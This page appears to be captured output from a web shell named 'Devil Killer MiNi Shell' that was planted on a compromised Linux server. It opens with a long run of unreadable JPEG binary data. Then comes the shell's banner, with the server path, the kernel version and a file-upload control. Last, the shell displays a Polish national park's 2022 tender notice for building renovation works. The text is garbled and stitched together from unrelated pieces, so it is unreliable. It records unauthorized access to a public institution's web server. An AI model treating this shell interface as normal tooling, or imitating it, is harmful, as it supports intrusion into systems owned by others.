JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20220906/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20220906/0033536401-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> „Remont, budowa i adaptacja budynków i obiektów związanych z udostępnieniem turystycznym oraz ochroną zwierząt w Roztoczańskim Parku Narodowym&#34; </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Roztoczański Park Narodowy</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 061362589</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Plażowa 2</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Zwierzyniec</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">22-470</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">lubelskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL812 - Chełmsko-zamojski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">846872066</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">sekretariat@roztoczanskipn.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://www.roztoczanskipn.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - inne państwowe i samorządowe osoby prawne utworzone na podstawie odrębnych ustaw w celu wykonywania zadań publicznych</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Inna działalność</span> </h3> <p class="mb-0"> ochrona przyrody </p> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> „Remont, budowa i adaptacja budynków i obiektów związanych z udostępnieniem turystycznym oraz ochroną zwierząt w Roztoczańskim Parku Narodowym&#34; </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-0e68841c-2dbe-11ed-9171-f6b7c7d59353</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00335364</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-09-06</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2022/BZP 00065883/06/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.3 Remont i adaptacja budynków i obiektów w RPN</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> http://www.bip.roztoczanskipn.pl/ <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://miniportal.uzp.gov.pl/</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1)W niniejszym postępowaniu<br/>komunikacja Zamawiającego z Wykonawcami odbywa się przy użyciu środków komunikacji elektronicznej, za pośrednictwem<br/>Platformy działającej pod adresem https://miniportal.uzp.gov.pl/ 2)Korzystanie z Platformy przez Wykonawcę jest bezpłatne.<br/>Instrukcja do miniPortalu znajduje się pod adresem: https://miniportal.uzp.gov.pl/Instrukcja_uzytkownika_miniPortal-ePUAP.pdf<br/>3)Wykonawca przystępując do postępowania o udzielenie zamówienia publicznego, akceptuje warunki korzystania z Platformy<br/>określone w Regulaminie zamieszczonym na stronie internetowej: https://ezamowienia.gov.pl/pl/regulamin/#regulamin-serwisu<br/>4)Wykonawca zamierzający wziąć udział w postępowaniu musi posiadać konto na Platformie. 5)Do złożenia oferty konieczne jest<br/>posiadanie przez osobę upoważnioną do reprezentowania Wykonawcy ważnego kwalifikowanego podpisu elektronicznego, podpisu<br/>zaufanego lub podpisu osobistego.6)Zalecenia Zamawiającego odnośnie kwalifikowanego podpisu elektronicznego:- dokumenty<br/>sporządzone i przesyłane w formacie .pdf zaleca się podpisywać kwalifikowanym podpisem elektronicznym w formacie PAdES;-<br/>dokumenty sporządzone i przesyłane<br/>w formacie innym niż .pdf (np.: .doc, .docx, .xlsx, .xml) zaleca się podpisywać kwalifikowanym podpisem elektronicznym w formacie<br/>XAdES;- do składania kwalifikowanego podpisu elektronicznego zaleca się stosowanie algorytmu SHA-2 (lub<br/>wyższego).9)Zamawiający określa następujące wymagania sprzętowo – aplikacyjne:a)stały dostęp do sieci Internet;b)posiadanie<br/>dowolnej i aktywnej skrzynki poczty elektronicznej (e-mail),c)komputer z zainstalowanym systemem operacyjnym Windows 7 (lub<br/>nowszym) albo Linux,d)zainstalowana dowolna przeglądarka internetowa - Platforma współpracuje<br/>z najnowszymi, stabilnymi wersjami wszystkich głównych przeglądarek internetowych (Internet Explorer 10+, Microsoft Edge, Mozilla<br/>Firefox, Google Chrome, Opera), e)włączona obsługa JavaScript oraz Cookies.7)Zamawiający dopuszcza następujący format<br/>przesyłanych danych: pliki o wielkości do 150 MB w formatach: .pdf,.doc, .docx., .xlsx, .xml. W przypadku złożenia w ofercie kilku<br/>dokumentów należy zapisać je do zip i dopiero zaszyfrować aplikacją do szyfrowania także jako zip. Zaleca się narzędzie do obsługi<br/>kompensacji plików 7-zip.8)Załączony i przesłany przez Wykonawcę za pomocą Platformy plik oferty wraz z załącznikami, nie jest<br/>dostępny dla Zamawiającego i przechowywany jest na serwerach Platformy w formie zaszyfrowanej. Zamawiający otrzyma dostęp<br/>do pliku dopiero po upływie terminu otwarcia ofert;9)oznaczenie czasu odbioru danych przez Platformę stanowi przyporządkowaną<br/>do dokumentu elektronicznego datę oraz dokładny czas (hh:mm:ss), widoczne przy wysłanym dokumencie w kolumnie ”Data<br/>przesłania”<br/>10)o terminie przesłania decyduje czas pełnego przeprocesowania transakcji pliku na Platformie.9)W postępowaniu o udzielenie<br/>zamówienia komunikacja pomiędzy Zamawiającym a Wykonawcami w szczególności składanie oświadczeń, wniosków (innych),<br/>zawiadomień oraz przekazywanie informacji odbywa się elektronicznie za pośrednictwem dedykowanego formularza dostępnego na<br/>ePUAP oraz udostępnionego przez miniPortal (Formularz do komunikacji). We wszelkiej korespondencji związanej z niniejszym<br/>postępowaniem Zamawiający i Wykonawcy posługują się numerem ogłoszenia ID postępowania).10)Ofertę, wraz ze stanowiącymi<br/>jej integralną część załącznikami, składa się pod rygorem nieważności w formie elektronicznej lub postaci elektronicznej za<br/>pośrednictwem Platformy, podpisaną kwalifikowanym podpisem elektronicznym, podpisem zaufanym lub podpisem osobistym.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust.1 i 2 rozporządzenia PE i Rady(UE) 2016/679 z dnia 27 kwietnia<br/>2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych<br/>i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE(ogólne rozporządzenie o ochronie danych)<br/>(Dz. Urz. UE L 119 z 04.05.2016, str. 1), dalej „RODO”, informuję, że:1)administratorem danych osobowych jest Roztoczański Park<br/>Narodowy z siedzibą w Zwierzyńcu ul. Plażowa 2, 22-470 Zwierzyniec, e-mail: sekretariat@roztoczanskipn.pl; 2) w sprawach<br/>związanych z przetwarzaniem danych osobowych, można kontaktować się z Administratorem Danych Osobowych Roztoczańskim<br/>Parkiem Narodowym pod adresem e-mail: sekretariat@roztoczanskipn.pl, telefon: +48 846872066 lub pisemnie na adres siedziby<br/>administratora 3) dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. CRODO w celu związanym z postępowaniem o<br/>udzielenie zamówienia publicznego pn. Remont, budowa i adaptacja budynków i obiektów związanych z udostępnieniem<br/>turystycznym oraz ochroną zwierząt w Roztoczańskim Parku Narodowym prowadzonym w trybie podstawowym bez negocjacji,<br/>zgodnie z atr.275 ust. 1 ustawy Pzp, znak: DAO.271.14.2022.zs; 4) odbiorcami danych osobowych będą osoby lub podmioty, którym<br/>udostępniona zostanie dokumentacja postępowania w oparciu o art. 18 oraz art. 74 ustawy z dnia 11września 2019 r.– Pzp (Dz. U. z<br/>2021 r., poz. 1129 ze zm.), dalej „ustawa Pzp”; 5) dane osobowe będą przechowywane, zgodnie z art. 78 ust. 1 ustawy Pzp, przez<br/>okres 4 lat od dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4 lata, okres<br/>przechowywania obejmuje cały czas trwania umowy. Przysługuje:<br/>-prawo dostępu do danych osobowych (art. 22 RODO, na podstawie art. 15 RODO); -prawo do sprostowania danych osobowych**<br/>(art. 16 RODO); -prawo żądania od administratora ograniczenia przetwarzania danych osobowych(art. 18 RODO) z zastrzeżeniem<br/>przypadków, o których mowa w art. 18 ust. 2 RODO***; -prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych<br/>Osobowych dotyczących naruszenia przepisów RODO; nie przysługuje: -prawo do usunięcia danych osobowych(art. 17 ust. 3 lit. b, d<br/>lub e RODO); -prawo do przenoszenia danych osobowych(art. 20 RODO); - prawo sprzeciwu, wobec przetwarzania danych<br/>osobowych (art. 21 RODO), podstawa prawna przetwarzania danych osobowych (art. 6 ust. 1 lit. c RODO).</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">DAO.271.14.2022.zs</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">2</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia są prace polegające na remoncie, budowie i adaptacji budynków i obiektów związanych z udostępnieniem turystycznym oraz z ochroną zwierząt w Roztoczańskim Parku Narodowym, podzielone na 2 części:<br/>Przedmiot zamówienia obejmuje:<br/>Część A zamówienia: Wydzielenie punktu gastronomicznego w Izbie leśnej we Floriance, oraz wykonanie punktu recepcyjnego w Rybakówce oraz malowanie kancelarii:<br/>1)	Wydzielenie punktu gastronomicznego w budynku Zielonej Sali Izby Leśnej, <br/>działka nr 859.<br/>Zakres prac obejmuje:<br/>- wykonanie wewnętrznych instalacji sanitarnych (wodna, kanalizacyjna), instalacje elektryczne,<br/>- budowa zewnętrznej instalacji kanalizacyjnej,<br/>- rozebranie posadzki z klinkieru i zastąpienie płytkami ceramicznymi w punkcie gastronomicznym, toalecie i pomieszczeniu gospodarczym,<br/>- wykonanie ścianek działowych wydzielających sanitariat i pomieszczenie socjalne,<br/>- wykonanie okładzin na ścianach drewnianych płytą osb-3 i pokrycie płytkami ceramicznymi.<br/>- wykonanie, wydzielenia punktu gastronomicznego poprzez montaż ścianek drewnianych,<br/>- montaż drzwi wewnętrznych i okien,<br/>- wykonanie zaplecza gastronomicznego wraz z wyposażeniem.<br/>- biały montaż,<br/>- wykonanie wentylacji grawitacyjnej,<br/>- lokalizacja miejsca składowania odpadów stałych.<br/>2)	Wykonanie punktu recepcyjnego w osadzie Rybakówka, działka nr 22.<br/>Zakres prac obejmuje:<br/>- roboty rozbiórkowe i ziemne,<br/>- wykonanie drewnianego stylizowanego ogrodzenia,<br/>- montaż szlabanu, wykonanie przyłącza elektrycznego.<br/>3)	Malowanie pomieszczeń kancelarii obwodów ochronnych Parku:<br/>- Obrocz - Zwierzyniec, ul. Biały Słup 16,<br/>- Słupy - Kosobudy 121,<br/>- Bukowa Góra - Zwierzyniec, ul. Plażowa 4,<br/>- Kruglik - Zwierzyniec, ul. Biały Słup 22,<br/>- Horodzisko - Kosobudy 100A,<br/>- Jarugi - Kosobudy 100A. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45000000-7 - Roboty budowlane</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45262522-6 - Roboty murarskie</p> <p class="mb-0">45442100-8 - Roboty malarskie</p> <p class="mb-0">45261000-4 - Wykonywanie pokryć i konstrukcji dachowych oraz podobne roboty</p> <p class="mb-0">45430000-0 - Pokrywanie podłóg i ścian</p> <p class="mb-0">45330000-9 - Roboty instalacyjne wodno-kanalizacyjne i sanitarne</p> <p class="mb-0">45311000-0 - Roboty w zakresie okablowania oraz instalacji elektrycznych</p> <p class="mb-0">45342000-6 - Wznoszenie ogrodzeń</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">6 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia są prace polegające na remoncie, budowie i adaptacji budynków i obiektów związanych z udostępnieniem turystycznym oraz z ochroną zwierząt w Roztoczańskim Parku Narodowym, podzielone na 2 części:<br/>Przedmiot zamówienia obejmuje:<br/>Część B zamówienia: Remont leśniczówki Cegielnia, wykonanie zadaszenia <br/>w Komanówce oraz budowa deszczochronu na Bukowej Górze:<br/>1)	Remont i adaptacja leśniczówki w osadzie Cegielnia jako miejsce przebywania i hibernowania nietoperzy, działka nr 18. <br/>Zakres prac obejmuje:<br/>- plantowanie terenu wokół budynku,<br/>- prace rozbiórkowe,<br/>- naprawa cokołu ceglanego,<br/>- naprawa podwalin, belki stropowej, fragmentów ścian, stolarki okiennej <br/>i drzwiowej oraz komina,<br/>- czyszczenie ścian z wapna, konserwacja ścian zewnętrznych,<br/>- wzmocnienie więźby dachowej,<br/>- wykonanie instalacji odgromowej.<br/>2)	Budowa zadaszenia nad płytą obornikową w osadzie Florianka, Górecko Stare 105, działka nr 858.<br/>	Zakres prac obejmuje: <br/>	- wykonanie drewnianej konstrukcji zadaszenia,<br/>	- montaż pokrycia dachu z blachy trapezowej (kolor: ceglasty połysk),<br/>	- montaż orynnowania,<br/>	- wykonanie ścianek ażurowych.<br/>3) Budowa deszczochronu na Bukowej Górze, działka nr 435.<br/>Zakres prac obejmuje:<br/>- roboty ziemne, fundamenty z osadzeniem palisad,<br/>- wykonanie konstrukcji w formie wiaty z drewna modrzewiowego,<br/>- pokrycie dachu – deskowanie pełne z gontem bitumicznym,<br/>- montaż ławek i stołów z drewna jodłowego - 2szt. stołów, ławki 4szt., kotwione do fundamentów betonowych.<br/>- wykonanie utwardzenia terenu. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45000000-7 - Roboty budowlane</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45111000-8 - Roboty w zakresie burzenia, roboty ziemne</p> <p class="mb-0">45422100-2 - Stolarka drewniana</p> <p class="mb-0">45262522-6 - Roboty murarskie</p> <p class="mb-0">45442110-1 - Malowanie budynków</p> <p class="mb-0">45261000-4 - Wykonywanie pokryć i konstrukcji dachowych oraz podobne roboty</p> <p class="mb-0">45233250-6 - Roboty w zakresie nawierzchni, z wyjątkiem dróg</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">6 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 1</p> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <p class="mb-0">Art. 109 ust. 1 pkt 8</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1.	O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy nie podlegają wykluczeniu oraz spełniają warunki udziału w postępowaniu i wymagania określone w niniejszej SWZ.<br/>2.	Zamawiający, na podstawie art. 112 ustawy Pzp określa następujące warunki udziału w postępowaniu:<br/>	Warunki udziału w postępowaniu<br/>1	Zdolność do występowania w obrocie gospodarczym -<br/>Zamawiający nie stawia warunków w tym zakresie.<br/>2	Uprawnienia do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów -<br/>Zamawiający nie stawia warunków w tym zakresie.<br/>3	Sytuacja ekonomiczna lub finansowa: <br/>Zamawiający określa minimalne poziomy zdolności dotyczące posiadania przez Wykonawców zdolności finansowej niezbędnej do realizacji zamówienia: posiadanie środków finansowych lub zdolności kredytowej <br/>w kwocie nie mniejszej niż: część A - 50 000,00 złotych, <br/>część B - 50 000,00 złotych brutto w okresie nie wcześniejszym niż 3 miesiące przed złożeniem oświadczenia.<br/>4	Zdolność techniczna lub zawodowa:<br/>- Zamawiający uzna, że Wykonawca posiada wymagane zdolności techniczne lub zawodowe do należytego wykonania zamówienia, jeżeli Wykonawca wykaże:<br/>1) wykonanie minimum 1 roboty budowlanej o podobnym charakterze polegającej na:<br/>- dla części A - remoncie i konserwacji budynków,<br/>- dla części B - remoncie i konserwacji budynków lub budowie i remoncie małej architektury drewnianej lub wszystkich wskazanych razem prac.<br/>Prace o wartości co najmniej 50 tys. zł. brutto wykonane w okresie ostatnich <br/>5 lat licząc wstecz od dnia w którym upływa termin składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie,<br/>2) niezbędnych kwalifikacji zawodowych osób skierowanych przez Wykonawcę do realizacji zamówienia, umożliwiające realizację zamówienia na 